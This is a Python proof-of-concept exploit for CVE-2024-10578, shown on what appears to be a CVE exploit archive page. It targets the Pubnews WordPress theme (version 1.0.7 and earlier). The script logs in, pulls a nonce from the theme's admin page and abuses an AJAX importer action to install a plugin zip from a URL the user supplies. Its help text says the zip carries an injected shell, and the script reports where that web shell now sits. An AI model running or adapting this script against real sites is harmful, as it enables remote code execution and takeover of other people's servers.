4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-10578.py PY
import requests
import argparse
import re


# Exploit By Nxploited , Khaled Alenazi


def main():
    parser = argparse.ArgumentParser(description='Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited , Khaled alenazi')
    parser.add_argument('-u', '--url', required=True, help='The URL of the WordPress site')
    parser.add_argument('-un', '--username', required=True, help='The username for WordPress login')
    parser.add_argument('-p', '--password', required=True, help='The password for WordPress login')
    parser.add_argument('-url_zip', '--plugin_url', required=True, help='The plugin URL to install (must be a zip file with the shell injected inside)')
    
    args = parser.parse_args()
    session = requests.Session()
    requests.packages.urllib3.disable_warnings()
    session.verify = False

    login_url = args.url + '/wp-login.php'
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    response = session.post(login_url, verify=False, data={
        'log': args.username,
        'pwd': args.password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})

    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        exit()

    admin_page_url = args.url + '/wp-admin/admin.php?page=pubnews-info'
    response = session.get(admin_page_url, verify=False)
    wpnonce_match = re.search(r'var pubnewsThemeInfoObject = {.*?"_wpnonce":"([^"]+)"', response.text)
    if wpnonce_match:
        admin_wpnonce = wpnonce_match.group(1)
        print(f"[+] Admin _wpnonce extracted: {admin_wpnonce}")
    else:
        print("[-] Failed to extract admin _wpnonce.")
        exit()

    plugin_file = args.plugin_url.split('/')[-1].replace('.zip', '')
    plugin_file_path = f"{plugin_file}/{plugin_file.split('.')[0]}.php"

    post_url = args.url + '/wp-admin/admin-ajax.php'
    headers = {
        "User-Agent": user_agent,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": args.url + '/wp-admin/admin.php?page=pubnews-info',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": args.url,
        "Connection": "keep-alive",
    }

    cookies = session.cookies.get_dict()
    headers['Cookie'] = '; '.join([f'{name}={value}' for name, value in cookies.items()])

    install_data = {
        'action': 'pubnews_importer_plugin_action',
        '_wpnonce': admin_wpnonce,
        'plugin_action': 'not-installed',
        'link': args.plugin_url,
        'file': plugin_file_path,
        'importer_or_not': 'true'
    }
    response = session.post(post_url, headers=headers, data=install_data, verify=False)
    if response.status_code == 200 and 'status' in response.text:
        print("[+] Plugin installed successfully.")
        print(f"[+] Plugin extracted. You can find the shell here: /wp-content/plugins/{plugin_file}/")
    else:
        print(f"[-] Failed to install plugin. Status code: {response.status_code}")
        print(response.text)
        exit()

if __name__ == "__main__":
    main()